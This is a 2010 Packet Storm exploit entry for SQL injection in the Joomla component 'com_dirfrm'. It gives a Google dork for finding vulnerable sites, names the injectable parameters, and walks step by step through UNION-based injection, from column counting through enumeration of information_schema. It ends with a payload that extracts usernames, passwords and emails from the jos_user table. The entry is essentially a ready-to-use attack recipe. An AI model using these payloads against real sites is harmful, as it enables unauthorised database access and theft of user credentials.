Joomla Dirfrm SQL Injection

2010-08-18T00:00:00
ID PACKETSTORM:92888
Type packetstorm
Reporter Hieuneo
Modified 2010-08-18T00:00:00

Description

                                        
                                            `# Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  
# Date : 18 - 8 - 2010  
# Author : Hieuneo (Vietnam)  
# Version : All Versions  
# Tested on : Win 7 Home  
  
###############################################  
Dork google: inurl:"com_dirfrm"  
###############################################  
Exploit:  
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL  
Injection]&id=8&Itemid=32  
or  
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL  
Injection]&Itemid=32  
###############################################  
[SQL Injection]:  
-> Step1:  
- order by n--- False  
- order by n+1-- True  
  
-> Step2:null Union select 1,2,3,4,...,n+1--  
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null  
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  
  
-> Step3: replace display number on website  
version(), user(), database  
#if version SQL >=5 : try exploit with table system:  
___table_name from information_scheama.tables where table_schema=database()--  
___column_name form information_schema.columns where table_name=Char(name table)  
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  
  
-> Step 4: collecting information  
  
null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  
  
Done!  
#############Hieuneo@VBF################  
--  
Hieuneo  
  
`